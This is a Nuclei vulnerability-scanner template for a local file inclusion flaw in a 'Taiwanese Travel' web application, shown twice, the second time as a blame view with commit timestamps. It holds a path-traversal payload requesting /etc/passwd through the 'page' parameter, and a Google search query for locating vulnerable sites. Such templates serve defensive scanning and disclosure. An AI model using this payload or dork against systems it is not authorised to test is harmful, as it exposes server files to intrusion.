nuclei-templates/http/vulnerabilities/other/taiwanese-travel-lfi.yaml

id: taiwanese-travel-lfi

info:
  name: Taiwanese Travel - Local File Inclusion
  author: r3Y3r53
  severity: high
  description: |
    The vulnerability in '/index.php?page=' allows for Local File Inclusion (LFI), granting attackers the ability to include and potentially execute files on the server, compromising the application's security
  reference:
    - https://www.exploitalert.com/view-details.html?id=35607
  metadata:
    verified: true
    max-request: 1
    google-query: intext:"COPYRIGHT" inurl:?page=regulation.php
  tags: lfi,unauth,taiwanese

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?page=/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:x:0:0:"

      - type: word
        part: body
        words:
          - "travel"

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100f89374b317309c64aee573fbdd5421d20cda7a81b9a01c6749c67d478e3bd2a3022100f261eeb889ceac650a7762ddd48bae09cbd8caa7333593beab558e0c1a6014d6:922c64590222798bb761d5b6d8e72950
templates added 2023-10-17 07:20:28 +00:00			`id: taiwanese-travel-lfi`

			`info:`
			`name: Taiwanese Travel - Local File Inclusion`
			`author: r3Y3r53`
			`severity: high`
			`description: \|`
			`The vulnerability in '/index.php?page=' allows for Local File Inclusion (LFI), granting attackers the ability to include and potentially execute files on the server, compromising the application's security`
			`reference:`
			`- https://www.exploitalert.com/view-details.html?id=35607`
			`metadata:`
			`verified: true`
			`max-request: 1`
TemplateMan Update [Tue Oct 17 17:52:25 UTC 2023] :robot: 2023-10-17 17:52:26 +00:00			`google-query: intext:"COPYRIGHT" inurl:?page=regulation.php`
templates added 2023-10-17 07:20:28 +00:00			`tags: lfi,unauth,taiwanese`

			`http:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/index.php?page=/etc/passwd"`

Update taiwanese-travel-lfi.yaml 2023-10-17 17:54:30 +00:00			`matchers-condition: and`
templates added 2023-10-17 07:20:28 +00:00			`matchers:`
			`- type: regex`
			`part: body`
			`regex:`
			`- "root:x:0:0:"`

			`- type: word`
			`part: body`
			`words:`
			`- "travel"`

			`- type: status`
			`status:`
			`- 200`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 4b0a00483046022100f89374b317309c64aee573fbdd5421d20cda7a81b9a01c6749c67d478e3bd2a3022100f261eeb889ceac650a7762ddd48bae09cbd8caa7333593beab558e0c1a6014d6:922c64590222798bb761d5b6d8e72950`